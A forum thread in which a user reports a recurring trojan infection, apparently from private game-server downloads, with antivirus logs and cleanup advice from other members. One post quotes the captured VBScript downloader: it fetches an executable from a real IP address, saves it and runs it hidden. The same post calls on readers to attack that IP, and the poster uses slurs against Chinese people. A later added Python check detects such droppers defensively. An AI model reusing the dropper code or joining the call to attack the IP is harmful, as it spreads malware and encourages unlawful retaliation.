So i got this trojans

CATMAGEDDON
Loyal Member
Joined
Aug 17, 2014
Messages
1,666
Reaction score
293
It keeps trying to access my MS SQL Server 2012 (rule 5023, which Panda blocks),
then it creates these files:


Panda scan:
Trojan detected VBS/Psyme.C
Location: C:\410.vbs
02/01/2017 23:10 Deleted
Dangerous operation detected Rule 5023 02/01/2017 23:10 Blocked
Trojan detected Unknown name
Location: C:\hexsyno.exe
02/01/2017 23:09 Deleted
Trojan detected VBS/Psyme.C
Location: C:\401.vbs
02/01/2017 23:09 Deleted
Trojan detected Unknown name
Location: C:\Windows\System32\hexsyno.exe


Kaspersky scan:
sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="BAT/TrojanDownloader.Ftp.NOK trojan (cleaned by deleting)" ac=C fn="C:\xpsyno.exe"
sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="BAT/TrojanDownloader.Ftp.NLV trojan (cleaned by deleting)" ac=C fn="C:\Windows\System32\us.dat"
sh=0000000000000000000000000000000000000000 ft=- fh=0000000000000000 vn="BAT/TrojanDownloader.Ftp.NOK trojan (cleaned by deleting)" ac=C fn="C:\Windows\System32\xpsyno.exe"



It deletes them, but they are randomly created again. Ad-Aware, Malwarebytes, ESET Online and Kaspersky tools detect and delete them too, but they keep reappearing, so I request backup here.
It also tries to fk up my SQL Server and access it, so I stopped the service.

I think I downloaded an infected server file but can't remember which one; the Mabinogi ones (the last I downloaded) seem clean.
@Hycker @lastfun @DNC @SanGawku one of the MMORPG extra releases is infected but idk which one =/
 
Joined
Oct 28, 2011
Messages
2,465
Reaction score
1,258
Highly recommend you start scanning each of those Releases.
Not checking them before putting them into the Release section violates the rules of the forum, not to mention uncool for fellow community members who assume your releases are checked ahead of time (again a rule).



Biesmen CodeDragon SanGawku Shoelace
You 4 ought to be aware of the circumstances. This is a really nasty virus he has and that apparently is in the Releases section now.
Community ought to be alerted so they don't get hijacked.



xlw00tlx

I'd hit up malwarebytes and start going through the standard cleanup process of your box.
Everything that gets a flag ought to have the resources removed from each Release thread, request closing of infected Release threads, and an alert put into the thread(s) for community members' sake.
Not my call. But definitely a good suggestion.

Since you caused this, I highly recommend detailing the steps required to clean it up properly and posting it as an edit to any / all affected Release threads.
 
Elite Diviner
Joined
Apr 28, 2012
Messages
420
Reaction score
439
we were raped? )))
seriously -> check my computer
------------------
xlw00tlx
Give me the infected file
upload somewhere
We will solve our problems ourselves)
 
CATMAGEDDON
Loyal Member
Joined
Aug 17, 2014
Messages
1,666
Reaction score
293
@ Next time it replicates I'll make a zip and upload it.
DNC Malwarebytes on my disk D: (the servers one, 1 TB) detected 10 files so far, but those aren't related I think.
I think that every time I start SQL Server the trojan replicates, so my SQL Server is infected.
It also creates a user called yuddos.com in Win 7 with admin privileges, and that web is a Chinese site with a DDoS attack tool.

It also added some stuff to my hosts file in windir/system32.
Panda auto-kills it so I'm safe, but idk what the method of replication is. I think it's the VBS file but Panda kills it; there must be another one hidden.
 
"(still lacks brains)"
Loyal Member
Joined
Sep 2, 2011
Messages
2,371
Reaction score
1,361
I'd highly suggest formatting your entire system and going again if you're unable to get rid of it. Personally, I'd wipe and go again regardless. The recommendations the others have suggested should help though.
 
CATMAGEDDON
Loyal Member
Joined
Aug 17, 2014
Messages
1,666
Reaction score
293
@ Will do if it comes back; for now I'm clean.
I'll rescan again using ESET and Kaspersky (2 hours each), then update if it reappears.
I'll show those fking asians to not send me trojans and DDoS attack me.
 
Joined
Oct 28, 2011
Messages
2,465
Reaction score
1,258
I wouldn't stop at just scanning the most recent game. I'd be checking all archives, iso's, etc. No clue where you got it from and since you're unsure of when it started, giving advice on which to test aside from just mentioned is kind of a long shot.
Good luck.
 
◝(⁰▿⁰)◜Smile◝ (⁰▿⁰)◜
Developer
Joined
May 29, 2007
Messages
2,167
Reaction score
899
I would like to ask you guys to report any threads that contain a virus with "VIRUS"; all threads which potentially contain a virus will be instantly removed.

It's impossible to scan everything, it would be nice if we can get some feedback from the community. It's hard to keep an eye on everything but we are doing our best.
 
CATMAGEDDON
Loyal Member
Joined
Aug 17, 2014
Messages
1,666
Reaction score
293
Disk C: is clean now; disk D:, where I have the servers, has 18 infections so far.
All these servers are on extra releases.
Kabod Online is infected too.
I've had these files since like June or August last year. Why did it take so long to infect me? Are they kinda timed trojans/worms or something?
@lastfun here's one of the exes with the dat file I got


virustotal scan:



Edit!! Got the VBS!!
Help me fk this website! Here's where it downloads!
It's a fking dude in Shanghai, China, duck YOU CHINA!
Code:
Set psp = CreateObject("Msxml2.XMLHTTP")set ws=WScript.CreateObject("WScript.Shell")
psp.Open "GET","http://221.194.44.221:77/syno.exe",0
psp.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(psp.responseBody)
aGet.SaveToFile "c:\syno.exe",2
wscript.sleep 8000
ws.Run "c:\syno.exe",0
EDIT!!!!
The YUDDOS.COM account on Windows 7 reappeared after I deleted it.
Every time that script executes and the exe runs, it creates the damn account.





BIG EDIT! FIXED IT I THINK
My SQL Server was infected. Every time I start the processes mssql and SQL Writer
the infection comes back, so it was a server file, but again, idk which one. Uninstalling SQL Server 2012 and I'm trying to get a clean one.
All ya do me a favor anyway,and attack that ip,take him down,that china a**hole is sending trojans tru that ip:221.194.44.221:77
 
Last edited:
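A static triage check for the download-and-execute chain seen in the script quoted in the post above, as an added example that is not part of the original thread. The function name `triage_vbs` and both sample scripts are constructed for illustration, and the sample uses a reserved documentation address rather than the host from the thread.

```python
import re

# Constructed sample mirroring the structure of the quoted script, including
# its run-together first line; 192.0.2.10 is a reserved documentation address.
SAMPLE_VBS = r'''Set psp = CreateObject("Msxml2.XMLHTTP")set ws=WScript.CreateObject("WScript.Shell")
psp.Open "GET","http://192.0.2.10:77/sample.exe",0
psp.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Open()
aGet.Write(psp.responseBody)
aGet.SaveToFile "c:\sample.exe",2
ws.Run "c:\sample.exe",0
'''
# Constructed benign script: launches a program but downloads nothing.
BENIGN_VBS = 'Set sh = CreateObject("WScript.Shell")\nsh.Run "notepad.exe", 1\n'

# VBScript is case-insensitive, and the patterns do not rely on line breaks.
PROGID = re.compile(r'CreateObject\s*\(\s*"([^"]+)"', re.I)
OPEN_URL = re.compile(r'\.Open\s*\(?\s*"(?:GET|POST)"\s*,\s*"([^"]+)"', re.I)
SAVE = re.compile(r'\.SaveToFile\s*\(?\s*"([^"]+)"', re.I)
RUN = re.compile(r'\.Run\s*\(?\s*"([^"]+)"', re.I)

def triage_vbs(text):
    """Report which dropper stages a VBScript contains and how they chain."""
    progids = {p.lower() for p in PROGID.findall(text)}
    urls = OPEN_URL.findall(text)
    dropped = [p.lower() for p in SAVE.findall(text)]
    run = [p.lower() for p in RUN.findall(text)]
    stages = {
        "fetch": bool(urls) and any("xmlhttp" in p or "winhttp" in p for p in progids),
        "write": bool(dropped) and "adodb.stream" in progids,
        "exec": bool(run) and "wscript.shell" in progids,
    }
    # The strongest signal: a file the script saved is the file it then runs.
    executed_drops = sorted({d for d in dropped if any(r.startswith(d) for r in run)})
    return {"stages": stages, "urls": urls, "executed_drops": executed_drops,
            "dropper": all(stages.values()) and bool(executed_drops)}

if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_VBS), ("benign", BENIGN_VBS)):
        print(name, triage_vbs(script))
```

The extracted URLs and drop paths are what to feed into firewall blocks and file-system sweeps; the check reads the script as text and never executes it.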
CATMAGEDDON
Loyal Member
Joined
Aug 17, 2014
Messages
1,666
Reaction score
293
@:dontknow: Everything was working normally 2 days ago, then I got infected; something passed through my Comodo firewall and Panda antivirus (very well hidden).

I think it was a hidden timed trojan. I removed all with Ad-Aware, Malwarebytes and Kaspersky,
but something infected my MSSQL server; now it gives an error when uninstalling it and Management Studio and the Native Client.

The last stuff I downloaded was Mabinogi, redownloaded Atlantica server, MU Online (http://forum.ragezone.com/f197/muservices-season-6-episode-3-a-1055512/), N-Age (http://forum.ragezone.com/f857/age-5-0-server-client-1112765/) or Rakion (old archive files).
 